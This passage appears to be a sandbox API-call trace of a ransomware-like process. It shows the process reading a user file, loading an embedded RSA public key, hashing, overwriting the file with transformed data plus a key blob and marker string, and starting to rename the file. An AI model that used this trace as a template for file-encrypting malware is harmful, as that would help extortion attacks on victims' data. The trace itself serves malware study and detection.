flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.145] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.145] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.147] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0130.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.149] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.150] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.150] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.150] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.150] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.150] GetLastError () returned 0x0 [0130.150] SetLastError (dwErrCode=0x0) [0130.150] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.151] GetLastError () returned 0x0 [0130.151] SetLastError (dwErrCode=0x0) [0130.152] GetLastError () returned 0x0 [0130.152] SetLastError (dwErrCode=0x0) [0130.152] GetLastError () returned 0x0 [0130.152] SetLastError (dwErrCode=0x0) [0130.152] GetLastError () returned 0x0 [0130.152] SetLastError (dwErrCode=0x0) [0130.152] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.152] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.152] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.152] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.152] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10b20) returned 0xdd2c688 [0130.153] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16980 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169e0 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169c8 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16aa0 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.153] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169c8 | out: hHeap=0x4970000) returned 1 [0130.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16aa0 | out: hHeap=0x4970000) returned 1 [0130.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16aa0 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd169c8 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16aa0 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169c8 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.154] GetCurrentThreadId () returned 0x618 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d52c0 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.155] GetCurrentThreadId () returned 0x618 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169c8 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16aa0 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169b0 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a58 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169c8 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd169c8 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169c8 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.157] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a58 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16aa0 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169b0 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169e0 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2a10 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.158] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.158] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x10b19, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x10b19, lpOverlapped=0x0) returned 1 [0130.159] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.159] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.159] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.159] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.159] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.159] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.159] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.159] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.159] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.160] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.160] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.160] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.160] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.160] CloseHandle (hObject=0x5c8) returned 1 [0130.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x7516fe8 [0130.164] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.164] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js 